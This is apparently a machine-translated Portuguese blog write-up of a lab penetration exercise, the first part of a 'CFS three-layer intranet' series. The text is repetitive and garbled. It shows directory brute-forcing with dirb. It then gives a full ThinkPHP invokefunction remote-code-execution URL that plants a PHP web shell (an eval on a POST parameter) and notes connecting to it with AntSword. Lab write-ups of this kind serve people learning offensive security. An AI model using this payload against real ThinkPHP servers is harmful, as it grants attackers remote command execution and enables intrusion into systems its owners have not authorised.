Penetração da intranet de três camadas CFS - gerenciamento de rede externa (1)

Gerenciamento de rede externa de penetração de intranet de três camadas CFS (1)

2024-07-12

Índice

Vamos explodir primeiro para ver se há alguma maneira de atacar.

Tentei o caminho suspeito e descobri que era o framework thinkphp. Também conhecia a versão, então vamos lutar no dia seguinte.

escreva para php

Edite e escreva em php com sucesso, basta obtê-lo no dia seguinte

Espada Formiga rce tente link

Gerenciado com sucesso

Gerenciamento de rede externa

Vamos explodir primeiro para ver se há alguma maneira de atacar.

Você pode tentar dirsearch, dirb, gobuster e outras ferramentas

dirb http://192.168.20.130/

Tentei o caminho suspeito e descobri que era o framework thinkphp. Também conhecia a versão, então vamos lutar no dia seguinte.

escreva para php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Escrito com sucesso em php, fácil de conseguir.

http://192.168.20.130/public/shell.php

Compartilhamento de tecnologia

Gerenciamento de rede externa de penetração de intranet de três camadas CFS (1)

Gerenciamento de rede externa

Vamos explodir primeiro para ver se há alguma maneira de atacar.

Tentei o caminho suspeito e descobri que era o framework thinkphp. Também conhecia a versão, então vamos lutar no dia seguinte.

escreva para php

Escrito com sucesso em php, fácil de conseguir.

Espada Formiga rce tente link

Gerenciado com sucesso

Perfil pessoal

minhas informações de contato